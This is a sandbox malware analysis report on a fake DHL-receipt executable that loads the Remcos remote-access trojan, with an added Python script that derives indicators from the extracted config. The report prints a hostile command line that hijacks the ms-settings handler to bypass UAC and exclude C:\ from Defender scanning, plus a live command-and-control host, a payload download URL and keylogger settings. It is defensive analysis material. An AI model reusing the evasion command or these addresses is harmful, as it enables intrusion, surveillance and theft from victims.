Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Lxfiwkfy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfiwkfy
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yfkwifxL.pif, NewProcessName: C:\Users\Public\Libraries\yfkwifxL.pif, OriginalFileName: C:\Users\Public\Libraries\yfkwifxL.pif, ParentCommandLine: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe", ParentImage: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ParentProcessId: 7380, ParentProcessName: DHL119040 receipt document,pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, ProcessId: 7476, ProcessName: yfkwifxL.pif
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csfciyc0.c1a.ps1
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
Source: Process started | Author: frack113 | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-0X3XK5

              Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 84 98 61 E5 04 5A 3A 86 B7 FD 3E F9 FC DA 29 16 E8 5D C6 88 D7 3D E6 50 ED 13 56 23 B8 BF 3A 7F 26 6C BC 71 6A 11 BF 12 58 C1 C9 0E CF 73 65 7C C5 9A B1 64 56 33 33 63 ED 63 BA 78 48 03 DA 61 DC 52 , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5\exepath

Snort IDS alerts:
Timestamp: 07/11/24-12:47:11.473328 | SID: 2032776 | Source Port: 49736 | Destination Port: 44577 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 07/11/24-12:49:23.758131 | SID: 2032777 | Source Port: 44577 | Destination Port: 49736 | Protocol: TCP | Classtype: A Network Trojan was detected
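The Remcos configuration block earlier in the report, the registry writes in this section and the two Snort alerts are three views of the same implant, and the config is what ties them together: the mutex string is reused as the Run value name (HKLM\...\WOW6432Node\...\Run\Rmc-0X3XK5, the 32-bit redirection of the HKLM Run key) and as a HKCU\SOFTWARE subkey (HKCU\SOFTWARE\Rmc-0X3XK5\exepath), and the configured port 44577 is the destination port of the first alert and the source port of the reply. The following is an added example, not Joe Sandbox code and not part of the sample: it derives host and network IOCs from the config fields, classifies the report's three SetValue targets against them, and matches the Snort alerts on the configured C2 port. The config, registry targets and alert values are copied from this report; the record field names (sid, src_port, dst_port) are an assumption, not a real alert schema, and the dynamic-DNS suffix list is deliberately limited to the one provider seen here.

```python
"""Derive IOCs from the extracted Remcos configuration and check this report's
registry and IDS observations against them. Added example; not Joe Sandbox code
and not part of the sample. Config, registry targets and alert values are copied
from the report; the alert/registry record field names are an assumption."""
from __future__ import annotations

# Remcos configuration as extracted by the report (only the fields used here).
CONFIG = {
    "Host:Port:Password": "jantasagasa.duckdns.org:44577:0",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Copy file": "remcos.exe",
    "Mutex": "Rmc-0X3XK5",
    "Keylog flag": "1",
    "Keylog file": "logs.dat",
}

# Only the dynamic-DNS provider seen in this report; a production list is much longer.
DYNDNS_SUFFIXES = ("duckdns.org",)
RUN_KEY_PART = "\\CURRENTVERSION\\RUN\\"  # matches both the native and the Wow6432Node Run key

def remcos_iocs(cfg: dict[str, str]) -> dict:
    """Artifacts to hunt for, derived from the config fields. The mutex string
    doubles as the Run value name and as a HKCU\\SOFTWARE subkey, which is what
    the SetValue events in this report show."""
    host, port, password = cfg["Host:Port:Password"].rsplit(":", 2)  # single C2 entry in this sample
    mutex = cfg["Mutex"]
    return {
        "c2": [(host, int(port))],
        "password": password,
        "uses_dynamic_dns": host.lower().endswith(DYNDNS_SUFFIXES),
        "mutex": mutex,
        "run_hives": [h for h, k in (("HKCU", "Setup HKCU\\Run"), ("HKLM", "Setup HKLM\\Run"))
                      if cfg.get(k) == "Enable"],
        "run_value_name": mutex,
        "dropped_binary": cfg["Copy file"],
        "keylog_file": cfg["Keylog file"] if cfg.get("Keylog flag") == "1" else None,
    }

def classify_registry_event(target: str, iocs: dict) -> str | None:
    """Label a SetValue target path (case-insensitive) against the derived IOCs."""
    t, mutex = target.upper(), iocs["mutex"].upper()
    if t.startswith("HKEY_CURRENT_USER\\SOFTWARE\\" + mutex + "\\"):
        return "remcos_settings_key"            # e.g. ...\Rmc-0X3XK5\exepath
    if RUN_KEY_PART in t:
        return "remcos_run_key" if t.endswith("\\" + mutex) else "other_run_key_persistence"
    return None

def alerts_matching_c2(alerts: list[dict], iocs: dict) -> list[int]:
    """SIDs of IDS alerts whose source or destination port is a configured C2 port."""
    ports = {port for _, port in iocs["c2"]}
    return [a["sid"] for a in alerts if a["src_port"] in ports or a["dst_port"] in ports]

# Constructed from the report: the three SetValue targets and the two Snort alerts.
REGISTRY_EVENTS = [
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfiwkfy",  # DBatLoader .url autostart
    r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-0X3XK5",
    r"HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5\exepath",
]
ALERTS = [
    {"sid": 2032776, "src_port": 49736, "dst_port": 44577, "proto": "TCP"},
    {"sid": 2032777, "src_port": 44577, "dst_port": 49736, "proto": "TCP"},
]

if __name__ == "__main__":
    iocs = remcos_iocs(CONFIG)
    print(iocs)
    for target in REGISTRY_EVENTS:
        print(classify_registry_event(target, iocs), target)
    print("alerts on C2 port:", alerts_matching_c2(ALERTS, iocs))
```

The keylog path is intentionally not derived from "Keylog path": "Application path": the report's dropped file is C:\ProgramData\trhrth\logs.dat, not next to C:\ProgramData\Remcos\remcos.exe, so only the file name is a safe IOC. The first registry write (Lxfiwkfy) is classified as generic Run-key persistence because it belongs to the DBatLoader stage, not to Remcos.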


              AV Detection

              barindex
              Source: DHL119040 receipt document,pdf.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}
              Source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: DHL119040 receipt document,pdf.exeVirustotal: Detection: 18%Perma Link
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA73837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_2DA73837
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5A48C8 CryptUnprotectData,connect,CreateEventW,CreateEventW,WSAGetLastError,5_2_2D5A48C8
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5A6A63 LoadLibraryA,GetProcAddress,CryptUnprotectData,5_2_2D5A6A63
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5B14F5 SetEvent,CryptUnprotectData,inet_ntoa,5_2_2D5B14F5
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5D3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_2D5D3837
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 20_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,20_2_00404423
Source: DHL119040 receipt document,pdf.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

              Privilege Escalation

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA474FD _wcslen,CoGetObject,0_2_2DA474FD
Source: C:\Users\Public\ger.exe | Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"
Source: DHL119040 receipt document,pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 
00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 
00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_2DA4BD37
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW,0_2_2DA4783C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_2DA4880C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_2DA59AF5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49665
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_2DA4C34D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_2DA5C291
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49253
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_45BC10F1
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_2D5AC34D
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_2D5ABD37
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_2D5A9665
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose,5_2_2D5A880C
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW,5_2_2D5A783C
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_2D5ABB30
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5B9AF5 FindFirstFileW,5_2_2D5B9AF5
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_2D5BC291
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,7_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,7_2_00007FF7689B35B8
